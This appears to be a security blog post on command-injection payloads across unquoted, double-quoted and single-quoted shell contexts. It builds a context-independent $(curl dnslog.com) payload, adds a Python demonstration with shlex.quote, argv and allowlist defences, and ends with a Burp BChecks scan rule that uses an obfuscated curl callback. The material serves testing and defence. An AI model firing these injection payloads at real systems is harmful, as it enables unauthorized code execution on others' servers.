This article was last updated 7 days ago; the information in it may be out of date. If you find an error, please send an email to 3449421627@qq.com
Preface
This post summarizes every quoting context a command injection can land in and derives the most generic payload that works in all of them.
Throughout the article, the attacker-controllable part is written as test.
Direct concatenation
curl test.abc.com
payload
curl test.$(curl dnslog.com).com
Double-quote concatenation
curl test.abc.com
payload
curl "test.$(curl dnslog.com).com"
Single-quote concatenation
curl test.abc.com
payload
curl 'test.'$(curl dnslog.com)'.com'
Summary
Single and double quotes combined
curl 'test.'"$(curl dnslog.com).com"''
Input payload
'"$(curl dnslog.com).com"'
This payload does not work in the direct-concatenation case (the leading single quote turns the whole substitution into a literal string).
So the final, context-independent payload is
$(curl dnslog.com)'$(curl dnslog.com)'
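To make the mechanism behind that final payload concrete, and to show what actually stops it, here is an added Python example (not part of the original post). It replaces curl with echo and the DNS-log callback with a harmless $(echo INJ) so the substitution is visible in the output instead of causing a request; the three command templates are assumed stand-ins for the post's unquoted, double-quoted and single-quoted concatenation. The vulnerable builder shows why exactly one half of the payload executes in every context, and the two hardened builders (shlex.quote over the whole argument, and an argv list with no shell) plus a hostname-label allowlist show the defender's side.

```python
import re
import shlex
import subprocess

# Constructed stand-in for the post's final payload: $(curl dnslog.com) is
# replaced by $(echo INJ) so the result is a visible string, not a callback.
PAYLOAD = "$(echo INJ)'$(echo INJ)'"

# Assumed command templates mirroring the post's three concatenation styles.
# "{}" is the attacker-controllable part the post calls "test".
TEMPLATES = {
    "unquoted": "echo test.{}.abc.com",
    "double":   'echo "test.{}.abc.com"',
    "single":   "echo 'test.{}.abc.com'",
}


def run_sh(command: str) -> str:
    """Run one command string through /bin/sh and return its stripped stdout."""
    result = subprocess.run(["sh", "-c", command], capture_output=True,
                            text=True, check=True)
    return result.stdout.strip()


def vulnerable(style: str, value: str) -> str:
    """String concatenation: the shell parses the user value as syntax.

    In each context one $(...) is substituted and the other is left literal,
    which is exactly why the combined payload fires everywhere.
    """
    return run_sh(TEMPLATES[style].format(value))


def hardened_quoted(value: str) -> str:
    """Build the complete argument first, then shlex.quote it.

    The shell receives a single-quoted word (embedded quotes are escaped by
    shlex), so $(...) and both quote characters stay literal bytes.
    """
    return run_sh("echo " + shlex.quote(f"test.{value}.abc.com"))


def hardened_argv(value: str) -> str:
    """No shell at all: an argv list means there is nothing to re-parse."""
    result = subprocess.run(["echo", f"test.{value}.abc.com"],
                            capture_output=True, text=True, check=True)
    return result.stdout.strip()


# Allowlist check for the value's intended use: a single DNS label.
_LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def is_valid_label(value: str) -> bool:
    """True only for a syntactically valid hostname label (RFC 1123 shape).

    Rejecting anything else up front stops every payload in this post before
    it reaches a shell, regardless of which quoting context it would land in.
    """
    return bool(_LABEL.match(value)) and "$" not in value


if __name__ == "__main__":
    for style in TEMPLATES:
        print(f"{style:9s} vulnerable -> {vulnerable(style, PAYLOAD)}")
    print(f"shlex.quote        -> {hardened_quoted(PAYLOAD)}")
    print(f"argv list          -> {hardened_argv(PAYLOAD)}")
    print(f"allowlist accepts payload? {is_valid_label(PAYLOAD)}")
```

Running it prints the three vulnerable outputs with INJ spliced in at a different position each time, while both hardened forms print the payload back verbatim and the allowlist rejects it. The allowlist is the cheapest fix when the value has a known shape; the argv form is the right default whenever a shell is not actually required.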
BChecks
metadata:
    language: v1-beta
    name: "rce"
    description: "rce"
    author: "chain00x"

given insertion point then
    send payload:
        appending: `$(a=cu;b=rl;$a$b {generate_collaborator_address()})'$(a=cu;b=rl;$a$b {generate_collaborator_address()})'`

    if any interactions then
        report issue:
            severity: high
            confidence: firm
            detail: "rce"
            remediation: "rce"
    end if